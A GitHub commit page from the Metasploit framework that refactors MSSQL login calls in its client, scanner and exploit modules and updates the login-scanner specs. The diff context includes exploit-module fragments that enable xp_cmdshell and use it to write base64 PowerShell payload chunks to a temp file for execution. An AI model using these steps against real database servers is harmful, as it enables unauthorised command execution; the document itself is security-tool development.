Skip to content

Commit

Permalink
testing fix
Browse files Browse the repository at this point in the history
  • Loading branch information
zgoldman-r7 committed Jan 30, 2024
1 parent d05b650 commit 6d47fb8
Show file tree
Hide file tree
Showing 12 changed files with 28 additions and 29 deletions.
4 changes: 2 additions & 2 deletions lib/metasploit/framework/tcp/client.rb
Original file line number Diff line number Diff line change
Expand Up @@ -73,6 +73,7 @@ module Client
# @see Rex::Socket::Tcp
# @see Rex::Socket::Tcp.create
def connect(global = true, opts={})

dossl = false
if(opts.has_key?('SSL'))
dossl = opts['SSL']
Expand All @@ -92,12 +93,11 @@ def connect(global = true, opts={})
'SSLCipher' => opts['SSLCipher'] || ssl_cipher,
'Proxies' => proxies,
'Timeout' => (opts['ConnectTimeout'] || connection_timeout || 10).to_i,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
'Context' => { 'Msf' => framework, 'MsfExploit' => framework_module }
)
# enable evasions on this socket
set_tcp_evasions(nsock)


# Set this socket to the global socket as necessary
self.sock = nsock if (global)

Expand Down
2 changes: 1 addition & 1 deletion lib/msf/core/module/alert.rb
Original file line number Diff line number Diff line change
Expand Up @@ -202,7 +202,7 @@ def add_alert(level, msg, &block)
def alert_user
self.you_have_been_warned ||= {}

errors.each do |msg|
errors.each do |msg|
if msg && !self.you_have_been_warned[msg.hash]
print_error(msg)
self.you_have_been_warned[msg.hash] = true
Expand Down
2 changes: 1 addition & 1 deletion lib/rex/proto/mssql/client.rb
Original file line number Diff line number Diff line change
Expand Up @@ -66,9 +66,9 @@ def initialize(framework_module, framework, rhost, rport = 1433)
#
def mssql_login(user='sa', pass='', db='', domain_name='')
disconnect if self.sock

connect
mssql_prelogin

if auth == Msf::Exploit::Remote::AuthOption::KERBEROS
idx = 0
pkt = ''
Expand Down
1 change: 0 additions & 1 deletion modules/auxiliary/admin/mssql/mssql_enum.rb
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,6 @@ module to work, valid administrative user credentials must be
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE
))

end

def run
Expand Down
1 change: 0 additions & 1 deletion modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
Original file line number Diff line number Diff line change
Expand Up @@ -342,7 +342,6 @@ def sql_statement()

# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
begin
#here
result = mssql_query(sql, false) if mssql_login_datastore

column_data = result[:rows]
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/admin/mssql/mssql_idf.rb
Original file line number Diff line number Diff line change
Expand Up @@ -154,7 +154,7 @@ def run
full_table.slice!(-1, 1)
count_sql += full_table

result = mssql_query(count_sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
result = mssql_query(count_sql, false) if mssql_login_datastore

count_data = result[:rows]
row_count = count_data[0][0]
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/scanner/mssql/mssql_hashdump.rb
Original file line number Diff line number Diff line change
Expand Up @@ -25,7 +25,7 @@ def initialize

def run_host(ip)

if !mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
if !mssql_login_datastore
print_error("Invalid SQL Server credentials")
return
end
Expand Down Expand Up @@ -70,7 +70,7 @@ def run_host(ip)
create_credential_login(login_data)

# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[0]
instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
print_status("Instance Name: #{instancename.inspect}")
version = mssql_query(mssql_sql_info())[:rows][0][0]
version_year = version.split('-')[0].slice(/\d\d\d\d/)
Expand Down
4 changes: 0 additions & 4 deletions modules/auxiliary/scanner/mssql/mssql_ping.rb
Original file line number Diff line number Diff line change
Expand Up @@ -16,10 +16,6 @@ def initialize
'License' => MSF_LICENSE
)

register_options(
[
OptInt.new('THREADS', [true, "The number of concurrent threads (max one per host)", 1]),
])
deregister_options('RPORT')
end

Expand Down
3 changes: 0 additions & 3 deletions modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb
Original file line number Diff line number Diff line change
Expand Up @@ -36,9 +36,6 @@ def initialize(info = {})
'DefaultTarget' => 0,
'DisclosureDate' => '2005-12-08'
))
register_options([
OptBool.new('DISPLAY_RESULTS', [true, "Display the Results to the Screen", true])
])
end

# Do not automatically run this module, it can lead to lockouts with SQL Server 2005
Expand Down
4 changes: 2 additions & 2 deletions modules/exploits/windows/mssql/mssql_clr_payload.rb
Original file line number Diff line number Diff line change
Expand Up @@ -51,7 +51,7 @@ def initialize(info = {})
end

def check
unless mssql_login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DATABASE'])
unless mssql_login_datastore(datastore['DATABASE'])
vprint_status('Invalid SQL Server credentials')
return Exploit::CheckCode::Detected
end
Expand Down Expand Up @@ -133,7 +133,7 @@ def is_clr_enabled
end

def exploit
unless mssql_login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DATABASE'])
unless mssql_login_datastore(datastore['DATABASE'])
fail_with(Failure::BadConfig, 'Unable to login with the given credentials')
end

Expand Down
14 changes: 7 additions & 7 deletions modules/exploits/windows/mssql/mssql_linkcrawler.rb
Original file line number Diff line number Diff line change
Expand Up @@ -78,7 +78,7 @@ def exploit
# Check if credentials are correct
print_status("Attempting to connect to SQL Server at #{datastore['RHOST']}:#{datastore['RPORT']}...")

if !mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
if !mssql_login_datastore
print_error("Invalid SQL Server credentials")
print_status("-------------------------------------------------")
return
Expand Down Expand Up @@ -408,20 +408,20 @@ def enable_xp_cmdshell(path,name,shelled)
# Enabling show advanced options and xp_cmdshell
execute = "sp_configure 'show advanced options',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_login_datastore
result = mssql_query(sql, false) if mssql_login_datastore
end

# Enabling xp_cmdshell
print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
execute = "sp_configure 'xp_cmdshell',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_login_datastore
result = mssql_query(sql, false) if mssql_login_datastore
end

# Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'"
sql = query_builder(path,"",0,execute)
result = mssql_login_datastore
result = mssql_query(sql, false) if mssql_login_datastore
xpcmdNow = result[:rows].pop.pop

if xpcmdNow == 1 or xpcmdOrig == 1
Expand Down Expand Up @@ -510,19 +510,19 @@ def powershell_upload_exec(path)
mytext_64.scan(/.{1,2500}/).each {|part|
execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
result = mssql_query(sql, false) if mssql_login_datastore
linenum = linenum+1
}

# Remove duplicate lines from temp file and write to new file
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
result = mssql_query(sql, false) if mssql_login_datastore

# Remove tracking tags from lines
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
result = mssql_query(sql, false) if mssql_login_datastore

# Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
# If running on 64bit system, 32bit powershell called from syswow64
Expand Down
16 changes: 12 additions & 4 deletions spec/lib/metasploit/framework/login_scanner/mssql_spec.rb
Original file line number Diff line number Diff line change
Expand Up @@ -35,7 +35,6 @@
it_behaves_like 'Metasploit::Framework::LoginScanner::Base', has_realm_key: true, has_default_realm: true
it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
it_behaves_like 'Metasploit::Framework::LoginScanner::NTLM'
it_behaves_like 'Metasploit::Framework::Tcp::Client'

it { is_expected.to respond_to :windows_authentication }

Expand Down Expand Up @@ -81,25 +80,34 @@

context '#attempt_login' do
context 'when the is a connection error' do
let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
it 'returns a result with the connection_error status' do
my_scanner = login_scanner
expect(my_scanner).to receive(:mssql_login).and_raise ::Rex::ConnectionError
allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_raise ::Rex::ConnectionError
allow(client).to receive(:disconnect)
expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
end
end

context 'when the login fails' do
let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
it 'returns a result object with a status of Metasploit::Model::Login::Status::INCORRECT' do
my_scanner = login_scanner
expect(my_scanner).to receive(:mssql_login).and_return false
allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_return(false)
allow(client).to receive(:disconnect)
expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::INCORRECT
end
end

context 'when the login succeeds' do
let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
it 'returns a result object with a status of Metasploit::Model::Login::Status::SUCCESSFUL' do
my_scanner = login_scanner
expect(my_scanner).to receive(:mssql_login).and_return true
allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_return(true)
allow(client).to receive(:disconnect)
expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
end
end
Expand Down

0 comments on commit 6d47fb8

Please sign in to comment.